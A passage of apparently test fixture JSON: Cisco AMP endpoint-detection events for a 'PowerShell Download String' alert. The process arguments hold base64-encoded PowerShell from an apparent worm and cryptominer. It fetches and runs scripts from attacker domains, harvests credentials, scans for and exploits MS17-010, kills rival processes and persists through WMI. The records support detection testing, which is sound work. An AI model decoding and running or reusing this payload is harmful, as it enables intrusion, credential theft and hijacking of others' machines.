wAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1